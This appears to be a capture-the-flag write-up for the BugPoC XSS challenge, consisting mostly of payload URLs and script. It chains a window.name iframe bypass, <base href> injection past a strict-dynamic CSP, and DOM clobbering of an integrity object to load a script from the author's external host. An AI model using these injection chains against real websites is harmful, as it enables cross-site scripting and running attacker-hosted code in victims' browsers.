BugPoC XSS CTF CHALLENGE!

  1. Bypassing the Iframe restriction
  2. Handling CSP
  3. DOM Clobbering to XSS

Bypassing the Iframe restriction

<script>
window.name="iframe";
window.location = `https://wacky.buggywebsite.com/frame.html?param=BugPocXSS`;
</script>

Handling CSP

content-security-policy:script-src 'nonce-rhgmumyjsmmg' 'strict-dynamic'; frame-src 'self'; object-src 'none';
https://wacky.buggywebsite.com/frame.html?param=</title><base href="https://akshanshjaiswal.com/"></base>
Failed to find a valid digest in the 'integrity' attribute for resource 'https://akshanshjaiswal.com/files/analytics/js/frame-analytics.js' with computed SHA-256 integrity 'RnJQK/rQg1gc8uIFVGW1ssXVg0r5PCN9kJSN7cYJglo='. The resource has been blocked.

DOM Clobbering to XSS

console displays analytics information
window.fileIntegrity = window.fileIntegrity || {   'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',   'algorithm' : 'sha256',   'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',   'creationtime' : 1602687229  }
https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" integrity="test">
window.parent.alert(document.domain)
Header set Access-Control-Allow-Origin "*"
https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" name="value" href="https://akshanshbug.000webhostapp.com">
<script>window.name="iframe";
window.location = `https://wacky.buggywebsite.com/frame.html?param=</title><base id="fileIntegrity"></base><base id="fileIntegrity" name="value" href="https://akshanshbug.000webhostapp.com">`;
</script>

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store